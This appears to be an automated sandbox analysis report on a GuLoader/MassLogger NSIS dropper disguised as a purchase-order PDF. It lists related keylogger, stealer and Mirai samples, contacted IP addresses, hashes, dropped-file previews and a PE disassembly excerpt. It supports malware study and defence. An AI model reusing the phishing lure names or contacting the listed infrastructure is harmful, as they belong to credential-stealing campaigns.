                                                                                                              PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              CLOUDFLARENETUSEallentoff_401k_1484013830.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 104.18.11.207
                                                                                                              Hkeyboard.dllGet hashmaliciousUnknownBrowse
                                                                                                              • 104.21.40.214
                                                                                                              powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                              • 1.13.202.149
                                                                                                              Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                                                                              • 104.21.67.146
                                                                                                              Non-Disclosure Agreement.htmlGet hashmaliciousUnknownBrowse
                                                                                                              • 104.17.25.14
                                                                                                              rs.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                              • 172.67.211.185
                                                                                                              ny.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                              • 104.21.93.157
                                                                                                              hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                              • 172.65.251.78
                                                                                                              slifdgjsidfg19.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                              • 172.65.251.78
                                                                                                              De17De16.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                              • 172.65.251.78
                                                                                                              UTMEMUSF.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                              • 132.240.253.211
                                                                                                              x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                              • 132.244.23.61
                                                                                                              PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              54328bd36c14bd82ddaa0c04b25ed9adOverheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              HUSDGHCE23ED.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.67.152
                                                                                                              66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.67.152
                                                                                                              RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.67.152
                                                                                                              Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eTii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Non-Disclosure Agreement.htmlGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              rs.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              ny.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                              • 149.154.167.220
                                                                                                              slifdgjsidfg19.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                              • 149.154.167.220
                                                                                                              De17De16.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                              • 149.154.167.220
                                                                                                              fghdsdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                              • 149.154.167.220
                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                              • 149.154.167.220
                                                                                                              ny.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              37f463bf4616ecd445d4a1937da06e19INVOICE-0098.pdf ... .lnk.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                              • 172.217.17.65
                                                                                                              • 216.58.208.238
                                                                                                              YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                              • 172.217.17.65
                                                                                                              • 216.58.208.238
                                                                                                              F8HYX5HOgA.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                              • 172.217.17.65
                                                                                                              • 216.58.208.238
                                                                                                              0iTxQouy7k.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                              • 172.217.17.65
                                                                                                              • 216.58.208.238
                                                                                                              tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                              • 172.217.17.65
                                                                                                              • 216.58.208.238
                                                                                                              t5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                              • 172.217.17.65
                                                                                                              • 216.58.208.238
                                                                                                              Overheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • 172.217.17.65
                                                                                                              • 216.58.208.238
                                                                                                              Corporate_Code_of_Ethics_and_Business_Conduct_Policy_2024.pdf.lnk.d.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                              • 172.217.17.65
                                                                                                              • 216.58.208.238
                                                                                                              main.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                              • 172.217.17.65
                                                                                                              • 216.58.208.238
                                                                                                              deb.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                              • 172.217.17.65
                                                                                                              • 216.58.208.238
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              C:\Users\user\AppData\Local\Temp\nsd51BE.tmp\System.dllPAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                    PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                      PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                          REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                            SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                              O0rhQM49FL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                O0rhQM49FL.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                  Process:C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):286557
                                                                                                                                  Entropy (8bit):7.770343888910271
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:9+IYOsNolNiweVFXz/H3qABowdHC6giUXb2vq1pk:YIYOsNoCz/HjnHC6gis2cu
                                                                                                                                  MD5:42F88ECDCF508CA1F030AB99654B1B94
                                                                                                                                  SHA1:F2D3F277A442D52BEAC7D580F54965B52B7A1DA9
                                                                                                                                  SHA-256:AC87B5B811677F1A060BDF7600FD496C3FE7206E477AF66E9E87E8E31494A414
                                                                                                                                  SHA-512:2ACD83002BF2A2978E6867E0DD6E8C63B558F5B46A8F09C93DA7E324E6D4A4A11E9D9F59CDE92ABFFC7CB67CF270945C3DDDA974AAE5A62F4D91A643E8BED197
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:...77...MM...U....................a.@@..........||..W...............................]........TT.C......xxx.......................ccc.........888.((((......**....................k....N.aa.............................fff....................bbb.........w.............8..<..TTTTTTT....................;;;;;...88888............MM..E.............G................2..........A........7777...44....====..gggg..I.!......................QQ....55.o...................RR..........TTTT..........>.......____....................yyyy..._...........qq..............K..............................................kk.........''.``....[............;;;;.rrr.............||.....P.'.....................v....EEE....___..................................^^....jjjjj.......................G.(..""..HH....AAA............###....,...........y..h...........ssss................S....i................99.Q....}}}}}}.......................<..........2..........((....G...aa.........................).>>....L...xx............;;.....p
                                                                                                                                  Process:C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):56641
                                                                                                                                  Entropy (8bit):1.2318917163845036
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:vrBeaW6xu5Pd9GW0Zq+/HXF1qcGNMUd8phxiFQHOV7hpvZlq:t9+Pdop/306xixrlq
                                                                                                                                  MD5:39C9A5F767D8C170B5CE38EA8D5734D4
                                                                                                                                  SHA1:4B4CA81EB3D093645B504004F62A269D4EACDECC
                                                                                                                                  SHA-256:87A7017021050071DBE5726BF9AC505763CD923E2BDE93336CA0905802CD8D49
                                                                                                                                  SHA-512:AE2D66B801251046FA4D3093391B916955B43BE75A954DD398583B1B8881A9F109F51F81D6E4FE759F83AC7B921FA89B02185013AFDE16D3C8EAB422BE89B4FF
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:.............l.........z........i........8.........................m.........f.C.Z..............I./........T..1.......................!......................D.................................................................................U................................../........................................-.......................}.........T`.....0@.............................F..............................].........................L.........<.........................................................................................N......................................................x........................................................@............................................4..........'...................?..........I.............../....................L....,...............................................;......k.....................................i............4.......................................K.....7...7....c...................U..#..............................
                                                                                                                                  Process:C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):100679
                                                                                                                                  Entropy (8bit):4.621278860713537
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:WNPMSzD4yit9jfrvktCtUkSbywTZpryomlD:WNloyK9zbWO/miD
                                                                                                                                  MD5:93A2D636570664ED4B7EE832BC0032E3
                                                                                                                                  SHA1:235EDA5D6FF2BBA8924B02201A19F363CE45C1AE
                                                                                                                                  SHA-256:2950A96C82C080B013E477AC109CEA7823019329145AE64F81532B93C46C6480
                                                                                                                                  SHA-512:EF4887A3A677B0F165E039AD891F2A4091A415ED234B6A9912EB7556B5CD1F2A2B69A5D2D783C225BC98D14BEE87AE84105B745DC62414462FE296FC047B489A
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:....xx........KKK........<........&...........!!!......TT......__.............OOOO......................EEE.}}.......IIII...............TT...........QQ.....33.aaa...........................m.......7................. ...............]].I....``...............i..7....zz.....].W.I......%%........9.........g........MMM.......'......jjjj...........}}}}.....H.GGG..........}.a..2.....==..............N......QQ.........99.............(...................444........s.99............................77.z...............4....>.......a..t.....................j."".............uu.%.>..........`..{{.................h...lll.4......99......................{{........&....'.......ZZ.....................ee.......................{.......c..........?.........:...vvvvv..................................gg................||.............{..nn...............oo...,.......qq...............................V....m......]]]]]]....00.K....9........FF.)..............{{..RRR.L.....j..ww...........777..000.........vvvvvv....E.]
                                                                                                                                  Process:C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  File Type:ASCII text, with very long lines (345), with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):345
                                                                                                                                  Entropy (8bit):4.241929841155785
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6:dvkdMOL4xnuXGNQWjMIDw1luhPB46xAJX7sBJOdkmLA8gMfArpIXbgOwQWiQJEEC:dufExIoDe1lYnGJLsBQdtL6rpIrWQkJA
                                                                                                                                  MD5:AE69FE0F4D1E1115BC470031E661785C
                                                                                                                                  SHA1:8D3799826FE457C61C1E8EE5E3071683A8125BC5
                                                                                                                                  SHA-256:6B18768503395C809263568D3A8858810404C2B7D49DC7CB6CE5F717F5D6C7DE
                                                                                                                                  SHA-512:969C0DB048EAC4A9B447A0C0C463A7983F1B4091B6206E274B9D249F8311439B6C33F5AA1EDF9CD1AA27502DA49378D3E1B45F16909C55DF830E51684E9648BE
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:pandas omflakkendes tribrachic miskenning.nonvitally subcase syvendelens weighin.tilhreres lysed metencephalons aabentstaaendes arbejdsmarkedsstyrelsers.kodeskrifter indgaaet nstnederst desulphurise badevgtene caliche.reabsorption erhvervskommunernes aktuarerne ammunition whilere sughs.tusindaarigt barkers landholders butylation phrenicocolic.
                                                                                                                                  Process:C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  File Type:Matlab v4 mat-file (little endian) ', numeric, rows 63, columns 0
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):210366
                                                                                                                                  Entropy (8bit):1.240975322465592
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:vBTwJOLxCIF0V6iLboHog6BQlsMqlN1R0pmGy30wbfq6+9GmlsNh34k0uJ/QohER:cJigyyDJnLH7zA
                                                                                                                                  MD5:AEF78D8D561E8802286A78AAC6C73ED6
                                                                                                                                  SHA1:DDF5DA649482D0A553802827BB9F0EF64A7069E1
                                                                                                                                  SHA-256:45F24543C01C9A11CC2246A9B27569AF433EEF61C877A4E191B683315D3566BE
                                                                                                                                  SHA-512:93D43C0CECADF8E1F507F8E58D2B4D92995D8F7ECF213A23559938B380033A6D0D80B0816A8D6603864F821F4FEDC988E0F79BE14C6892089178970E08DC4199
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:low
                                                                                                                                  Preview:....?...........*=..'...........................m........................y............................................................................H.......................................c.......x........................................................:...s.......................+.........................................~.....2........C..Z...................................k............................i.........................................{...............................................?%............................................................................Z................................v.............<.....'.............L..........................................+...............................s.........................................W........................`........................[..............&..................T................................j......M......[.....................c.............................................9.......................................
                                                                                                                                  Process:C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):363811
                                                                                                                                  Entropy (8bit):1.2512349423386382
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:768:y2f405GRYtnSLOBbyCociR2TVuEpHsVURGxwGmXjyMB+CtKDOgt9rlHF1QOs+9m5:pIuagbnK7CwVwFpYogwhUsvCq
                                                                                                                                  MD5:BFEA15C03AB295424981A73637A19491
                                                                                                                                  SHA1:A5ADABDDC373D6B3004F96946D84B651E42D9F5C
                                                                                                                                  SHA-256:83E9CE74259889DCABD39D41131F286882B224698DCDEB8D0B4074069AAA687B
                                                                                                                                  SHA-512:CB5969BFFAED8AF1791938E924E0CC9F876E45165F4E7EA5E9249131FACA831C0600F14BD68EF041D18C81A3FBE087970043D1B3B8A6786C1E5E5049834D4D0D
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:...................................................E....................................j.A..(.......................................+..........................$.............................................z.L........%......t...................................2l.............1.............................................................................U...g.......................`............................................................0..................................J......................................K...R...............................................................&...c......................................S......!...8..................Y......................................................>u........T...................L........................................................................0.........................................W.....L.n.....................................$.b...........B..................................................8...............!...............
                                                                                                                                  Process:C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):11776
                                                                                                                                  Entropy (8bit):5.655335921632966
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
                                                                                                                                  MD5:EE260C45E97B62A5E42F17460D406068
                                                                                                                                  SHA1:DF35F6300A03C4D3D3BD69752574426296B78695
                                                                                                                                  SHA-256:E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
                                                                                                                                  SHA-512:A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
                                                                                                                                  Malicious:false
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                  Joe Sandbox View:
                                                                                                                                  • Filename: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: RFQ December-January Forcast and TCL.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: PAYMENT ADVICE TT07180016-24_pdf.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: PURCHASE ORDER TRC-0909718-24_pdf.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: SWIFT091816-24_pdf.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: SWIFT09181-24_pdf.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: O0rhQM49FL.exe, Detection: malicious, Browse
                                                                                                                                  • Filename: O0rhQM49FL.exe, Detection: malicious, Browse
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  Process:C:\Users\user\Desktop\PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1180
                                                                                                                                  Entropy (8bit):3.2746695656782077
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:8wl0+sXU1e/tz0/CSL6/cBnwgXl341DEDeG41DEDWBQ1olfW+kjcmAaxCalCNfBh:8FvWLrFPjPKmizZMxnkjqy
                                                                                                                                  MD5:823719C88FF1294851DE589A3B80552F
                                                                                                                                  SHA1:D49CE16897A1B57A73E4A035925757D49ECD619B
                                                                                                                                  SHA-256:0228C01257EEAEDA4C18F9C02C68F8EFA1A0A1C03A2E264733D162D6570B599B
                                                                                                                                  SHA-512:34A74AE2912256C7CE80805A2548A758A99BC2C098E417FF11B286451F998374184811819979E83FDF08DC3E592A76D1981293501A96909FCC86EE79B628710F
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:L..................F........................................................q....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....b.1...........mindevrdigt.H............................................m.i.n.d.e.v.r.d.i.g.t.......2...........boghandlermedhjlperens.tor..f............................................b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r...*.../.....\.....\.....\.m.i.n.d.e.v.r.d.i.g.t.\.b.o.g.h.a.n.d.l.e.r.m.e.d.h.j.l.p.e.r.e.n.s...t.o.r.Y.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.r.a.p.i.d.i.t.e.t.e.n.s.\.f.r.e.m.t.v.i.n.g.\.V.e.r.m.i.n.l.y.............}........
                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                  Entropy (8bit):7.963673421473499
                                                                                                                                  TrID:
                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                  File name:PURCHASE ORDER TRC-090971819130-24_pdf.exe
                                                                                                                                  File size:477'600 bytes
                                                                                                                                  MD5:745504717878bb22b600df7e2c2dd9f4
                                                                                                                                  SHA1:9515d0277803511a4f401674f40f022ed69c85d7
                                                                                                                                  SHA256:8a4d38092e7f0245aa376d724cf3dbe08d4b563a86db3c99e70defaa38beb969
                                                                                                                                  SHA512:8035ff6f18deaaec620acd824bbcecf07d38f2e2f77e322942f635320af75bbc4bd60250f0e61094eed22cfeef652791d61476bd7b4c613ebb6fb7952ae48e4d
                                                                                                                                  SSDEEP:12288:I5AlMIL/obq71R7Oj6rgcPIcXuQd7lxu7Jj1JK8s5FEeKN:ZtL/o2BR7Zrgcwgpxu7Jj1Jiceg
                                                                                                                                  TLSH:36A42301A510D743D16114764C326FAEBAADB768DAA52F07278C2D053F336A2CD2FD9A
                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L......V.................d.........
                                                                                                                                  Icon Hash:3d2e0f95332b3399
                                                                                                                                  Entrypoint:0x4032a0
                                                                                                                                  Entrypoint Section:.text
                                                                                                                                  Digitally signed:false
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  Subsystem:windows gui
                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                  Time Stamp:0x567F847F [Sun Dec 27 06:26:07 2015 UTC]
                                                                                                                                  TLS Callbacks:
                                                                                                                                  CLR (.Net) Version:
                                                                                                                                  OS Version Major:4
                                                                                                                                  OS Version Minor:0
                                                                                                                                  File Version Major:4
                                                                                                                                  File Version Minor:0
                                                                                                                                  Subsystem Version Major:4
                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                  Import Hash:d4b94e8ee3f620a89d114b9da4b31873
                                                                                                                                  Instruction
                                                                                                                                  sub esp, 000002D4h
                                                                                                                                  push ebp
                                                                                                                                  push esi
                                                                                                                                  push 00000020h
                                                                                                                                  xor ebp, ebp
                                                                                                                                  pop esi
                                                                                                                                  mov dword ptr [esp+0Ch], ebp
                                                                                                                                  push 00008001h
                                                                                                                                  mov dword ptr [esp+0Ch], 0040A300h
                                                                                                                                  mov dword ptr [esp+18h], ebp
                                                                                                                                  call dword ptr [004080B0h]
                                                                                                                                  call dword ptr [004080ACh]
                                                                                                                                  cmp ax, 00000006h
                                                                                                                                  je 00007F00C4EFBE53h
                                                                                                                                  push ebp
                                                                                                                                  call 00007F00C4EFEF96h
                                                                                                                                  cmp eax, ebp
                                                                                                                                  je 00007F00C4EFBE49h
                                                                                                                                  push 00000C00h
                                                                                                                                  call eax
                                                                                                                                  push ebx
                                                                                                                                  push edi
                                                                                                                                  push 0040A2F4h
                                                                                                                                  call 00007F00C4EFEF13h
                                                                                                                                  push 0040A2ECh
                                                                                                                                  call 00007F00C4EFEF09h
                                                                                                                                  push 0040A2E0h
                                                                                                                                  call 00007F00C4EFEEFFh
                                                                                                                                  push 00000009h
                                                                                                                                  call 00007F00C4EFEF64h
                                                                                                                                  push 00000007h
                                                                                                                                  call 00007F00C4EFEF5Dh
                                                                                                                                  mov dword ptr [00434F04h], eax
                                                                                                                                  call dword ptr [00408044h]
                                                                                                                                  push ebp
                                                                                                                                  call dword ptr [004082A8h]
                                                                                                                                  mov dword ptr [00434FB8h], eax
                                                                                                                                  push ebp
                                                                                                                                  lea eax, dword ptr [esp+34h]
                                                                                                                                  push 000002B4h
                                                                                                                                  push eax
                                                                                                                                  push ebp
                                                                                                                                  push 0042B228h
                                                                                                                                  call dword ptr [0040818Ch]
                                                                                                                                  push 0040A2C8h
                                                                                                                                  push 00433F00h
                                                                                                                                  call 00007F00C4EFEB4Ah
                                                                                                                                  call dword ptr [004080A8h]
                                                                                                                                  mov ebx, 0043F000h
                                                                                                                                  push eax
                                                                                                                                  push ebx
                                                                                                                                  call 00007F00C4EFEB38h
                                                                                                                                  push ebp
                                                                                                                                  call dword ptr [00408178h]
                                                                                                                                  Programming Language:
                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x85c80xa0.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000x11e0.rsrc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  .text0x10000x637c0x640083ff228d6dae8dd738eb2f78afbc793fFalse0.672421875data6.491609540807675IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                  .rdata0x80000x147c0x1600d9f9b0b330e238260616b62a7a3cac09False0.42933238636363635data4.973928345594701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .data0xa0000x2aff80x6003f2b05c8fbb8b2e4c9c89e93d30e7252False0.53125data4.133631086111171IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .ndata0x350000x280000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .rsrc0x5d0000x11e00x120020639f4e7c421f5379e2fb9ea4a1530dFalse0.3684895833333333data4.485045860065118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                  RT_BITMAP0x5d2680x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
